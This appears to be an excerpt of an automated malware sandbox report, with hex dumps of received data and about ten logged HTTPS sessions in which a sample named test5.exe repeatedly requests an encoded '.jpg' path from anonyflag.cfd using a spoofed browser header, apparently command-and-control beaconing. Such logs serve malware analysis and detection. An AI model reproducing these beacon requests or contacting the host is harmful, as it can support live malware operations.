                    Data Ascii: \sUseUU)VPVPR[ETE<s2DS210>0S2S2n9we?/w1CJAz%;)??Q>LK'9Eg{eM@T@dy1@nPCM4]<hpL6\\:{|mr(IR;s+SW
                    2024-12-28 10:35:59 UTC8192INData Raw: 50 99 86 0d 50 99 86 3e 90 d1 0d 62 b4 e1 45 e9 c0 c5 05 a1 43 01 25 fe 80 cd e9 b6 03 21 c1 f2 88 eb 29 d2 74 14 d6 9a ff 55 c6 a9 2d 14 47 48 d2 eb b8 47 96 62 b0 0f 1d 23 a0 36 0d 2c 35 f4 84 3d 7d 77 40 15 be 3f cb d1 f6 b6 93 d9 be 3f e3 c9 f6 b6 9b d1 a3 f7 cd 90 f4 bf 40 f8 4c f7 c1 14 7c f6 c1 14 34 75 a5 30 7c 75 ed bd 38 51 bd f1 b3 ab f5 78 f7 8f b5 30 7a ca 55 78 f1 3b 1d f1 b5 1f 25 b9 38 5a 95 f5 b5 17 15 bd 3c 53 31 8d 74 de 74 75 38 53 30 51 50 1b b9 15 74 33 f1 98 31 fb b9 15 64 63 f1 98 29 73 b9 11 6d 57 99 f9 dc ab 66 06 59 6b 69 83 53 6e 69 83 eb 38 3c d6 be 74 b1 93 46 3c 3a 5d b1 12 b1 a7 70 fd ae a4 8a b9 25 53 cf d2 d3 4f 8e 59 05 a7 ab 6b 05 a7 20 b3 80 67 2f 36 10 63 2f 36 58 ee 7a 86 10 65 b4 6e df 86 4b 91 54 5e ce 51 5b db b4
                    Data Ascii: PP>bEC%!)tU-GHGb#6,5=}w@??@L|4u0|u8Qx0zUx;%8Z<S1ttu8S0QPt31dc)smWfYkiSni8<tF<:]p%SOYk g/6c/6XzenKT^Q[
                    2024-12-28 10:35:59 UTC8192INData Raw: bb e6 16 7b f6 9e fe 03 22 61 01 88 fa e4 c1 87 7f ce c4 87 7f 82 49 c2 67 ca c4 97 2f 82 49 da 1f 6a 14 0e e0 95 9f d6 65 55 90 53 6a 50 90 53 22 dd c4 77 52 95 49 3a 2a 7d dc ca d5 82 57 12 50 42 58 97 a7 46 58 97 eb cb 1c b3 9b 83 91 e6 73 cb 1c aa 57 bb f4 56 e8 44 0b dd 30 c1 cb d2 b5 1b cf d2 b5 53 42 86 91 23 0a 0b dd 07 7a e3 82 f7 85 1c 09 2f 00 dc 06 aa c1 d8 06 aa 8d 55 42 8e fd 1d cf db cd 55 42 97 e9 25 aa 51 56 da 55 da 8e 5f 95 d5 0b fb 91 d5 0b b3 1c 80 83 fb 91 cd e3 13 ba 3d 1c ec 31 e5 99 2c 3e 60 14 28 3e 60 58 a5 7b e8 10 28 2e e8 58 a5 63 60 b0 31 dc 9f 4f ba 04 1a 8f b5 81 68 8b b5 81 20 06 e0 09 68 8b ad 81 80 72 42 7e 7f f9 9a fb bf f6 1f a0 bb f6 1f ec 36 b3 97 a4 bb e6 df ec 36 ab 57 04 54 14 a8 fb df cc 2d 3b d0 49 6d 3f d0 49
                    Data Ascii: {"aIg/IjeUSjPS"wRI:*}WPBXFXsWVD0SB#z/UBUB%QVU_=1,>`(>`X{(.Xc`1Oh hrB~66WT-;Im?I
                    2024-12-28 10:36:00 UTC8192INData Raw: 20 ad f7 3a e0 d9 f2 d2 87 37 f2 d2 3d 13 f2 d2 3d 98 39 3a 62 ba 39 3a e7 7a 4d 3f 0f 28 a3 3f 0f c0 6e 1d 0f c0 eb dd 7b c5 03 99 95 c5 03 20 90 c5 03 20 d4 4c 3e 2c e0 4f 3e c4 db 81 3e c4 60 85 3e c4 60 8a 89 04 eb 41 00 01 b4 e1 03 01 5c 17 ce 01 5c 9c 06 e9 ef 99 07 e9 a7 12 ff a1 22 d2 8a a4 ca d8 64 a4 ca 53 af 4c 11 9e af 4c 54 ad 66 04 df 62 23 89 9e 63 a8 59 d6 ea dc 7d f6 02 25 80 f6 02 ae 4b 1e bc 63 4b 1e f4 e8 84 95 24 00 e4 e2 24 00 dd d7 8e 33 de d7 81 b5 32 d6 81 b5 b9 62 a5 2d b9 62 a5 61 32 16 81 51 7e 9d fd 75 46 d5 76 39 62 95 3b b2 a6 1e ee 5a 0a c8 ee 5a 46 45 eb 2b 7c 47 eb 91 fc 47 eb 91 b0 cc 23 d8 3b 01 cb 31 33 00 cb 79 b8 4c ef 39 f5 c7 2b 0a 27 f4 c6 e2 a3 22 c6 e2 ef af c3 ab d5 ad c3 11 55 ad c3 11 19 26 0b 58 92 e9 e3 99
                    Data Ascii: :7==9:b9:zM?(?n{ L>,O>>`>`A\\"dSLLTfb#cY}%KcK$$32b-ba2Q~uFv9b;ZZFE+|GG#;13yL9+'"U&X
                    2024-12-28 10:36:00 UTC8192INData Raw: 6c d4 98 28 a6 9d 13 fe 4e 07 ff fe 4e 06 e2 2a ce 05 e2 af 23 71 ea e7 a8 be 02 e7 55 41 fd af de 1d d9 ff 96 96 b5 db ce de 3e af ea be 76 2c 2e 8e 37 73 6f d0 68 b0 a3 1c a4 f8 28 d8 f7 b0 a9 34 c7 b1 a9 34 f4 6a e5 b9 bc 7a a9 34 f8 5e 99 b9 ab 4d 5e f9 bb 4d 5f f9 bb 05 d6 a5 9f 25 29 b0 f6 3c 2b b0 73 fc 5f a4 3b 71 13 80 0b 99 04 71 0b 99 39 b9 0b 99 39 b6 9f 5a b2 75 d7 db 76 45 d6 db 76 1e 15 62 77 1e 15 62 9e 1c 15 62 9e d0 d9 2a 17 8c fd 22 5f 05 89 06 47 52 c1 87 ab 12 c7 87 ab 21 1c 0c 50 c9 f5 0c 50 c9 78 47 52 8c 4b 8e 17 bf 8b 05 c6 36 d7 21 ee bf 8b 05 ce 40 9e e5 d7 42 9e ad 5c b2 d6 2e a4 4d a3 29 97 8d 4a b7 97 8d 4a ff 1e d1 6e bf 56 58 32 9b 6e 10 bf 1f 4a 48 b9 1f 4a 00 30 5b 6e 30 78 d6 2a 14 28 93 19 dd 6d a0 d9 67 12 d4 dd 27 5a
                    Data Ascii: l(NN*#qUA>v,.7soh(44jz4^M^M_%)<+s_;qq99ZuvEvbwbb*"_GR!PPxGRK6!@B\.M)JJnVX2nJHJ0[n0x*(mg'Z
                    2024-12-28 10:36:00 UTC8192INData Raw: 72 73 7d a4 fb 2f 59 ac b3 a6 35 88 a3 ee bc fc 87 f6 eb b4 04 1a cb fc 8f 07 3a 9c 8c 07 09 63 07 f5 41 e8 ee bd c4 33 9a e3 fd 48 9e 95 f3 0c 15 53 bb 87 c0 1b 30 4c 28 b1 30 4c 28 f9 bb 17 38 b1 3e cc 4d 55 76 47 50 97 16 44 50 df 93 9f 24 e9 10 e4 20 e9 67 ff 68 62 24 ef 20 e9 ef a7 a5 16 9b bf ed 9f dc af 05 fd 19 af 05 b5 92 f0 15 5e 48 b8 9e a5 00 33 c5 b5 eb e2 8d 3c ee 6e ed 3f ee 86 aa fa ee 86 e2 71 b2 a2 d2 39 39 ce f6 01 71 45 82 25 31 0d 01 e1 11 52 c2 2d dd 1a 4b 71 f9 0a 1c 39 7a e6 3c ba 03 e2 3c f2 88 18 74 79 51 6f 50 f2 58 87 e9 67 59 87 53 63 59 87 53 2b d4 cb 77 1b 90 46 35 1e 19 02 11 2e e6 d5 59 a5 ad dd b1 2b 7a dd b1 63 f1 81 95 5b b9 02 51 7b e6 c1 9d b7 2a 89 16 73 62 00 4e 7b 2a 89 26 6b 62 00 56 73 2a 89 2e 53 6b df 66 d0 87
                    Data Ascii: rs}/Y5:cA3HS0L(0L(8>MUvGPDP$ ghb$ ^H3<n?q99qE%1R-Kq9z<<tyQoPXgYScYS+wF5.Y+zc[Q{*sbN{*&kbVs*.Skf
                    2024-12-28 10:36:00 UTC8192INData Raw: 33 81 45 e7 00 53 0d 6e 4c 77 4d 26 c5 0b 69 1e 8d 82 1d 3a bd ca 96 f7 f5 43 ca d3 dd 0b 43 8f f9 2b bc 5f b1 12 20 7b 39 12 20 7b 36 87 e3 f0 f5 cb 6e ac d1 ab 27 27 8a bb 6e ac e1 a3 27 27 92 83 6e ac 71 dc ad 2c 08 c8 ad 64 83 81 a5 6b 07 0f a5 6b 07 e6 a4 6b 07 e6 68 23 8e ba 4c 2b c6 33 20 0f d6 7b a9 7b f2 63 fe 33 73 8f 0e 37 73 8f 46 bc 99 c7 cb e8 bd e7 82 63 4d af 09 9a 8a eb 2d ca 88 eb 3d ca 60 19 bd ca 60 2a 66 4f a0 5f 62 7c 60 b4 53 34 ed e0 77 14 a5 6b b8 5c 2c c7 9c fc 2c c7 9c b4 a5 73 b8 1c a5 73 b8 f4 8a f6 b8 f4 0f 36 cc 2f 47 bd 03 c7 e4 39 03 c7 67 c1 fc c8 f2 02 77 0b be 8f eb 2f 4e 8b eb 2f 07 00 b0 3f 4e 8b db 27 07 00 a8 07 4e 8b 4b 58 8d 47 87 10 04 1b a3 18 4c 92 d7 3c 5c c5 9f bd b0 35 9d bd b0 06 46 f5 3b f4 0e 7e c2 b9 8b
                    Data Ascii: 3ESnLwM&i:CC+_ {9 {6n''n''nq,dkkkh#L+3 {{c3s7sFcM-=``*fO_b|`S4wk\,,ss6/G9gw/N/?N'NKXGL<\5F;~


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449732104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:02 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:02 UTC867INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:02 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: MISS
                    Last-Modified: Sat, 28 Dec 2024 10:36:02 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Puqh9crOxVvCUzqAHLGNY4utIG8sOQsMkgc0pqn7PPt1bG3mdvOl6OZPuQlkNcJJFEU9nFG8Gfhb5Mk2GqGqK5zSpB26zPjXCgsLAd1KVY1ovoV7nNiZk9JFNhamsZHK"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e833c96ac358-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1694&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1646926&cwnd=155&unsent_bytes=0&cid=3b13d462fa41a6ab&ts=546&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449733104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:04 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:04 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:04 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:04 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7VQBdhpriZkJagJvQ6z2XqlmHDaQcq4nGUgKnimqxdCJyBrXQac91Zfa6ySniZsz4Q48xxEzdskAdDZU4ESyM%2BFxGEJCQ%2BRaRM71KEriBT%2BtD8Ikij8MzN%2F2gK6nGX6S"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8414c3480d9-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1439&rtt_var=589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1784841&cwnd=252&unsent_bytes=0&cid=b78e37806e9e791c&ts=756&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449734104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:06 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:06 UTC882INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:06 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:06 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EK2RmQzmAho9EZSFag1XT85MIc96uDaQ%2B%2FdW6kWRno%2BJwGABssxZ3rN%2B0eFHJ9fQoUfqMubECOxJ1LW2xjBACfvyNVQZYXXF%2BiAd9g4nQWHHcODgiWvgvzvS%2Bfkz6GO5"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e84e0b444308-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1746&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1672394&cwnd=228&unsent_bytes=0&cid=514c7e3d58babe45&ts=501&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449735104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:08 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:08 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:08 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:08 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYw7qYoEjiHmohMM4viZCz%2BmndmwEl1SNwtHYNyzveyN%2BAZYK0j19RR1KNOtURNlXjNBrTt3to3SZaqKTN0mtk5aZflT635rdmXh0HCuOYsPVQo053dAvIdqML%2BUnq2L"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e859bdeb4367-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1718&rtt_var=649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1679125&cwnd=237&unsent_bytes=0&cid=dde60ac98fd04611&ts=507&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449736104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:10 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:11 UTC874INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:10 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:10 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rbJtuFvnJ4zXbhb2qSpjG6GLK%2Bfuge1qnLQcy6zB1Z%2FdV5rEpaBdklndaNZp6KKuc0eqmpDjBqIR6Fk1uNVANZv5iDgBlew1KMRahdGFiAL9sqx9gQzXIL5U5SUqr9c"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e867bf97c43b-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=569&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1904761&cwnd=194&unsent_bytes=0&cid=8550d28f333e5012&ts=860&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449737104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:12 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:12 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:12 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:12 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Uygfk7HphXLGO8hYQSU3oVLB4a8tMtVrp9kepKDEZgQRZivHS3ueVtpugHz6qSVi6qxV%2BSN0JypQHysHDaibzNW3lomCNx0zWgcN58lOxWy0I4%2BeKc%2FRa4wO411TY1V"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e8737d510f55-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1660&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1759036&cwnd=156&unsent_bytes=0&cid=16e6fb1c21f311c7&ts=500&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449738104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:14 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:14 UTC874INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:14 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:14 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8rrlfCkSpuJZAc11R1cwA6s80awscaqYQZQ4ofOOmD3T7ezqxfqbAGiMW43%2BQlQSIDnMNlpt%2Bl3rM6eQ2RXo2qZFAuxzHPfvVQIYOIcrfqSZLU2JM561BnOb9XEKfiQU"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e87edeeb4319-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1633&rtt_var=630&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1711606&cwnd=233&unsent_bytes=0&cid=f3cf749f82e0a395&ts=499&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.449740104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:16 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:16 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:16 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:16 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qWWLTSORNMmj%2BZr9Iy%2FuIX3QO9UdI%2BeIV0elnQMTuCck9DTsmMo4OYIiMJSyMoiTmxtZf3NcGYfbdG6KcW6irMTksxkqgStu7t1iBjBm0jLJV%2BobIL8swtF7hBJhZogm"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e88b1f2d0f84-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1533&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1883870&cwnd=244&unsent_bytes=0&cid=2d44942b2a6ffd19&ts=515&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.449742104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:18 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:36:18 UTC882INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:36:18 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:36:18 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6GUX%2BBcYgusLmLyIEhMadeP3%2B0VbGkLqro%2FKlvSLTAlH96lElwfQuw7bLwIb4TZ6HUVOFpXhiv2SOWd%2FPg%2BO5xRRvosIm6ptmQr7NehiNwhTsNPXq%2FmI3mYDtoMAdrMB"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90e896ae2c8c36-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1841&min_rtt=1822&rtt_var=697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1602634&cwnd=165&unsent_bytes=0&cid=a994084e2b860896&ts=495&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.449745104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:36:19 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
